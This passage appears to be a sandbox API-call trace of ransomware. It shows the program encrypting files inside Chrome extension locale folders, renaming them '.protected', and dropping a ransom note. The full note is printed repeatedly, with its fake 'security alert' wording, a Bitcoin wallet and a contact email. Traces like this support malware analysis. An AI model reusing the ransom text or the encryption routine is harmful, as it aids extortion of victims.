lpBuffer=0xf01390*, 
nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.658] lstrlenA (lpString="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") returned 684 [0083.658] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.658] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.658] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.658] CloseHandle (hObject=0x164) returned 1 [0083.658] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.659] lstrcmpiW (lpString1="id", lpString2="Windows") returned -1 [0083.659] lstrcmpiW (lpString1="id", lpString2="Program Files") returned -1 [0083.659] lstrcmpiW (lpString1="id", lpString2="Program Files (x86)") returned -1 [0083.659] lstrcmpiW (lpString1="id", lpString2="$Recycle.bin") returned 1 [0083.659] lstrcmpiW (lpString1="id", lpString2="System Volume Information") returned -1 [0083.659] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id") returned 150 [0083.659] lstrcmpW (lpString1="id", lpString2=".") returned 1 [0083.659] lstrcmpW (lpString1="id", lpString2="..") returned 1 [0083.659] wnsprintfW (in: pszDest=0xd010e0, 
cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\*") returned 152 [0083.659] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.659] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.659] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.659] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.659] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.659] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.659] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\.") returned 152 [0083.659] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.659] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.659] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.659] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.659] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.659] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.659] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.659] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\..") returned 153 [0083.659] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.659] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.659] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.659] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.659] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.660] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.660] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.660] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.660] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json") returned 164 [0083.660] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.660] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.660] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.660] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.660] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.661] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json") returned 164 [0083.661] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.661] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json") returned 164 [0083.661] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.661] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json") returned 164 [0083.661] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.661] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.677] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.677] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.677] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.677] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: 
lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.678] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.678] CloseHandle (hObject=0x168) returned 1 [0083.678] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json.protected") returned 174 [0083.678] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json.protected")) returned 1 [0083.679] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.679] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.679] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\RESTORE_FILES.txt") returned 
168 [0083.679] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.680] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.680] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.692] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.692] WriteFile (in: hFile=0x164, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.692] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.692] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.692] CloseHandle (hObject=0x164) returned 1 [0083.692] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.692] lstrcmpiW (lpString1="it", lpString2="Windows") returned -1 [0083.692] lstrcmpiW (lpString1="it", lpString2="Program Files") returned -1 [0083.692] lstrcmpiW (lpString1="it", lpString2="Program Files (x86)") returned -1 [0083.692] lstrcmpiW (lpString1="it", lpString2="$Recycle.bin") returned 1 [0083.692] lstrcmpiW (lpString1="it", lpString2="System Volume Information") returned -1 [0083.692] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it") returned 150 [0083.692] lstrcmpW (lpString1="it", lpString2=".") returned 1 [0083.692] lstrcmpW (lpString1="it", lpString2="..") returned 1 [0083.692] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\*") returned 152 [0083.692] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.693] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.693] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.693] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.693] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.693] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.693] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\.") returned 152 [0083.693] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.693] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.693] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.693] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.693] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.693] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.693] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.693] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\..") returned 153 [0083.693] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.693] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.693] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.693] 
lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.693] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.693] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.693] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.693] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.693] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json") returned 164 [0083.693] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.693] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.693] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.693] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.693] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.694] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json") returned 164 [0083.694] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.694] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json") returned 164 [0083.694] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.694] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json") returned 164 [0083.694] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.694] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.702] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.702] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.703] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.703] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.713] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, 
lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.713] CloseHandle (hObject=0x168) returned 1 [0083.713] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json.protected") returned 174 [0083.713] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json.protected")) returned 1 [0083.714] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.714] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.714] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\RESTORE_FILES.txt") returned 168 [0083.714] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\RESTORE_FILES.txt" (normalized: 
"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.715] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.715] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, 
lpOverlapped=0x0) returned 1 [0083.716] lstrlenA (lpString="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") returned 684 [0083.717] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.718] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.718] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.718] CloseHandle (hObject=0x164) returned 1 [0083.718] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.718] lstrcmpiW (lpString1="iw", 